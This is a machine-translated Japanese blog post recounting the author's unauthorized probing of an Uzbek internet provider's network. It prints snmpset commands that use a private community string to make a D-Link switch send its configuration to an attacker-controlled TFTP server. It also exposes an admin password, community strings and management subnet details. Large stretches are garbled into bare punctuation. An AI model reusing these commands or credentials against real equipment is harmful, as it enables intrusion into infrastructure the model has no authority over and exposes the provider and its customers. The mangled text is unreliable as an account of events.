プロバイダーのネットワークの侵入テスト、またはウズベキスタンのプロバイダーにデータを信頼してはいけない理由

バックグラウンド

ほんの数ヶ月前、家庭用インターネットが機能し始めた、と言う人もいるかもしれませんが、ひどいことです。これは夕方にのみ発生しました。プロバイダーに旅行をしてこの厄介な問題に対処できる専門家がいなかったときです。奇妙なことに、手紙と申請書は何の結果ももたらさなかった。プロバイダーによると、専門家は日中に来ることができますが、インターネットが夕方に機能しない場合、日中はどうですか。そこで、問題の解決を待つ時間を過ごすために、プロバイダーのネットワークのセキュリティについて調査することにしました。これで何が起こったのか疑問に思っているなら、猫へようこそ。





PT0.1ENUM

LANからグローバルネットワークへのパケットのルートをトレースするときに数回点灯したため、10.3XX0 / 24サブネットからスキャンを開始することにしました。





80- . , , 161 - SNMP, . , public private community string , , .





PT1.1Gath

SNMP , DGS-3620-28SC - , , 20- SFP, 4 - 100/1000Base-T/SFP 4 10GBase-X SFP+. private community , snmpset.





snmpset -v2c -c $COMMUNITY $IP 1.3.6.1.4.1.171.12.1.2.18.1.1.3.3 a $TFTP_SERVER_IPP
snmpset -v2c -c $COMMUNITY $IP 1.3.6.1.4.1.171.12.1.2.18.1.1.5.3 s $FILE_NAME.cfg
snmpset -v2c -c $COMMUNITY $IP 1.3.6.1.4.1.171.12.1.2.18.1.1.7.3 s config.cfg
snmpset -v2c -c $COMMUNITY $IP 1.3.6.1.4.1.171.12.1.2.18.1.1.8.3 i 2
snmpset -v2c -c $COMMUNITY $IP 1.3.6.1.4.1.171.12.1.2.18.1.1.12.3 i 3
      
      



, j admin vfrtgb45switch( ), community strings vfrtgb45switch vfrtgb45switchrw . , , The Dude . , - MNGT vlan 4002 172.2X.X.0/15.





, mngt vlan - . , ARISTA-100G-CityPlace1 ARISTA-100GCityPlace2. , 50 L3 ( ), TCPDUMP .





PT2.1

, , ( , community string ), . : , . , , , . , , *** . , , . , , , . , . , " ". -, . , , "Turon Telecom" , . .





PT3.1 IT

, . , , , . : HTTP, SMTP . , IP DNS . , - . , - . , , .





PT4.1反応を待っています

これで記事が完成し、それを読む人の反応やプロバイダー自身の反応を待っています。ご清聴ありがとうございました。








All Articles